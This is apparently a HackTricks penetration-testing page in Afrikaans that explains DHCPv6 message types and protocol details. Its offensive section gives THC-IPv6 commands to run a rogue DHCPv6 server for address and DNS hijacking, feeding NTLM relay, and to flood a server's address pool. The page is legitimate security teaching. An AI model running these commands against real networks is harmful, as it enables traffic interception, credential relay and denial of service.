DHCPv6
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
DHCPv6 vs. DHCPv4 Message Types Comparison
’n Vergelykende oorsig van DHCPv6- en DHCPv4-boodskaptipe word in die tabel hieronder aangebied:
| DHCPv6 boodskaptipe | DHCPv4 boodskaptipe |
|---|---|
| Solicit (1) | DHCPDISCOVER |
| Advertise (2) | DHCPOFFER |
| Request (3), Renew (5), Rebind (6) | DHCPREQUEST |
| Reply (7) | DHCPACK / DHCPNAK |
| Release (8) | DHCPRELEASE |
| Information-Request (11) | DHCPINFORM |
| Decline (9) | DHCPDECLINE |
| Confirm (4) | none |
| Reconfigure (10) | DHCPFORCERENEW |
| Relay-Forw (12), Relay-Reply (13) | none |
Gedetailleerde uitleg van DHCPv6-boodskaptipe:
- Solicit (1): Deur ’n DHCPv6-kliënt geïnisieer om beskikbare bedieners te vind.
- Advertise (2): Deur bedieners gestuur as antwoord op ’n Solicit, wat beskikbaarheid vir DHCP-diens aandui.
- Request (3): Kliënte gebruik dit om IP-adresse of voorvoegsels van ’n spesifieke bediener aan te vra.
- Confirm (4): Deur ’n kliënt gebruik om te verifieer of die toegewezen adresse steeds geldig is op die netwerk, gewoonlik na ’n netwerkverandering.
- Renew (5): Kliënte stuur dit na die oorspronklike bediener om adresleeftyd te verleng of konfigurasies op te dateer.
- Rebind (6): Gestuur na enige bediener om adresleeftyd te verleng of konfigurasies op te dateer, veral wanneer daar geen reaksie op ’n Renew is nie.
- Reply (7): Bedieners gebruik dit om adresse, konfigurasieparameters te verskaf, of om boodskappe soos Release of Decline te erken.
- Release (8): Kliënte vertel die bediener om een of meer toegewezen adresse nie meer te gebruik nie.
- Decline (9): Deur kliënte gestuur om te rapporteer dat toegewezen adresse in konflik op die netwerk is.
- Reconfigure (10): Bedieners dryf kliënte aan om transaksies te begin vir nuwe of opgedateerde konfigurasies.
- Information-Request (11): Kliënte versoek konfigurasieparameters sonder IP-adrestoewysing.
- Relay-Forw (12): Relay-agente stuur boodskappe na bedieners.
- Relay-Repl (13): Bedieners antwoord aan relay-agente, wat dan die boodskap aan die kliënt aflewer.
Vinnige protokolnotas (Aanvallend)
- DHCPv6-kliënte gebruik UDP-poort
546en bedieners/relays gebruik UDP-poort547. - Kliënte stuur Solicit na All_DHCP_Relay_Agents_and_Servers (
ff02::1:2); bedieners/relays luister daar. All_DHCP_Servers isff05::1:3. - Kliënt- en bedieneridentiteite word in
OPTION_CLIENTIDenOPTION_SERVERIDgedra met behulp van DUIDs. Dit is handig vir fingerprinting van dieselfde host oor adresveranderinge. - Adrestoewysing word versoek met
IA_NA(nie-tydelike adres) en prefix-delegering metIA_PD(downstream-router-voorvoegsel).
Vinnige verkenning
# Basic DHCPv6 traffic capture
sudo tcpdump -vvv -i <IFACE> 'udp port 546 or udp port 547'
# THC-IPv6: discover DHCPv6 servers and their options
sudo atk6-dump_dhcp6 <IFACE>
Skelm DHCPv6 Server (adres/DNS Hijack)
# THC-IPv6: rogue DHCPv6 server advertising address + DNS
sudo atk6-fake_dhcps6 <IFACE> <PREFIX>/<LEN> <DNSv6>
Dit is ’n generiese on-link rogue DHCPv6-bediener. Op Windows/AD-netwerke, koppel dit aan hoërvlak relays (sien die IPv6-bladsy) as jy NTLM relay primitives wil hê.
Pool-uitputting / DHCPv6-uithongering
# THC-IPv6: exhaust the server's address pool
sudo atk6-flood_dhcpc6 <IFACE>
Reconfigure-boodskap kanttekening
DHCPv6 Reconfigure word nie blindelings aanvaar nie: kliënte aanvaar dit slegs as hulle uitdruklik OPTION_RECONF_ACCEPT gestuur het. Volgens verstek is ’n kliënt onwillig om Reconfigure-boodskappe te aanvaar, so onbetroubare Reconfigure-aanvalle misluk dikwels tensy jy daardie opsie waarneem/induseer.
Verwysings
-
https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.


